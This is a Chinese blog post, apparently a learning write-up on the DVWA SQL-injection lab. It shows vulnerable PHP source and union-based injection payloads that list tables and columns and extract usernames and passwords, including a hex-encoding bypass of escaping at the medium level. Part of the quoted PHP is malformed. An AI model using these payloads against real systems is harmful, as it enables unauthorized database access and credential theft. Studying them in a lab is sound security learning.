持续创作,加速成长!这是我参与「掘金日新计划 · 10 月更文挑战」的第13天,点击查看活动详情
手工注入常规思路
1.判断是否存在注入,注入是字符型还是数字型
2.猜解SQL查询语句中的字段数
3.确定回显位置
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.得到数据
eazy
是一个登录框,首先看一下源码
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysql_query( $query ) or die( ' mysql_error() . );
// Get results
$num = mysql_numrows( $result );
$i = 0; while( $i < $num ) {
// Get values $first = mysql_result( $result, $i, "first_name" );
$last = mysql_result( $result, $i, "last_name" );
// Feedback for end user
echo "<pre>ID: {$id}
//Increase loop count
$i++; }
mysql_close(); }
?>
首先,以get方式传submit这个参数,然后查找数据库,然后后面的意思就是输入数字,就会返回 ID Fisrt name lastname 按照上面的方法。 先判断注入类型
输入1 and 1=1和1 and 1=2 没变化,说明不是数字型注入
输入1‘ and ’1‘ = ’1 正常 1‘ and ’1‘ =’2不正常,说明是字符型注入
再判断列数,直到,1‘ order by 3开始报错,说明有两列
获取数据库的表
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
刚才提到了group_concat这个函数,但对这个函数的使用还不是特别了解
再来复习一下
不讲理论,直接上栗子
这是我创建的一个小小的表。 持续创作,加速成长!这是我参与「掘金日新计划 · 10 月更文挑战」的第13天,点击查看活动详情
select ID,group_concat(name) from persons group by ID;
这个时候我们就可以看到,通过ID 将他们分成了两种。
接下来,我们该获取表中的字段名
1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#
接下来获取字段中的数据
1’ union select user,password from users#
medium
中级显然跟初级不一样,这个时候我们只能选择ID 不能,手动输入,我们查看一下源码
`<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysql_real_escape_string( $id );
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
// Get results
$num = mysql_numrows( $result );
$i = 0;
while( $i < $num ) {
// Display values
$first = mysql_result( $result, $i, "first_name" );
$last = mysql_result( $result, $i, "last_name" );
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
// Increase loop count
$i++;
}
//mysql_close();
}
?>`
发现多了一个这个
$id = mysql_real_escape_string( $id );
一: 查一下这个函数
mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。 抓包看一下,id=1这可能会有数字型注入
然后id = 1 and 1=2
报错,说明存在注入,且注入方式为数字型注入
二:判断字段数
说明有两个字段
三:查表
1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
四:获取字段名
单引号被转义,所以通过十六进制绕过
union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #
五:获取数据
1 union select user,password from users#
今天就先学做到这。
